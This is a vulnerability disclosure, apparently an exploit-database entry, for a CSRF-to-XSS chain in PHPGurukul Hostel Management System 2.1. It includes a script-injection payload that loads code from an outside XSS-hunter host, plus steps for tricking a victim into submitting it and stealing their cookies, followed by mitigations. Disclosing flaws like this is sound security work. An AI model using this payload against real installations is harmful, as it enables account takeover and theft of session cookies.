vendor:
Hostel Management System
by:
Anubhav Singh
8.8
CVSS
HIGH
Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)
352
CWE
Product Name: Hostel Management System
Affected Version From: V 2.1
Affected Version To: V 2.1
Patch Exists: NO
Related CWE:
CPE: a:phpgurukul:hostel_management_system:2.1
Platforms Tested: Windows 10, XAMPP
2021
PHPGurukul Hostel Management System 2.1 – Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)
Navigate to http://localhost/hostel/hostel/my-profile.php and enter xss payload '><script src=https://anubhav1403.xss.ht></script> in name field. Click on Update Profile and intercept the request in Burpsuite. Generate a CSRF POC of Update Profile and send it to victim. When victim open the POC, his/her name will be updated to our XSS payload & payload will get fires. Attacker is able to steal Victim's cookies successfully!! Account takeover!!!
Mitigation:
Implement CSRF protection mechanisms such as tokens, origin checks, and referrer checks. Use a Content Security Policy (CSP) to prevent the execution of malicious scripts. Validate user input and encode output to prevent XSS attacks.